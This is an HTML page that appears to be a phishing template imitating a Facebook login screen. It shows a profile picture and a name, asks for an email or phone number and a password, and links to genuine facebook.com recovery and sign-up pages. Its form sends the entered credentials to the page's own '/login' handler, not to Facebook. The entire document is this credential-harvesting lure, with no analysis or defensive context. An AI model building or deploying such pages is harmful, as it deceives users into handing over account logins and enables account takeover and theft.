<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div id="maindiv">
        <br>
        <img src="mtz.jpg">
        <h3>Minn Than Sin</h3>
        <form action="/login" method="POST" id="loginform">
            <input type="text" name="email" placeholder="Email or Phone number">
            <input type="password" name="password" placeholder="Password"><br>
            <button type="submit">Login</button>
        </form><br>
        <a href="https://www.facebook.com/recover/initiate/?ars=facebook_login">Forgot account?</a>
        <a href="https://www.facebook.com/r.php?locale=en_US&display=page">Sign up for Facebook</a><br><br><br>
    </div>
</body>
</html>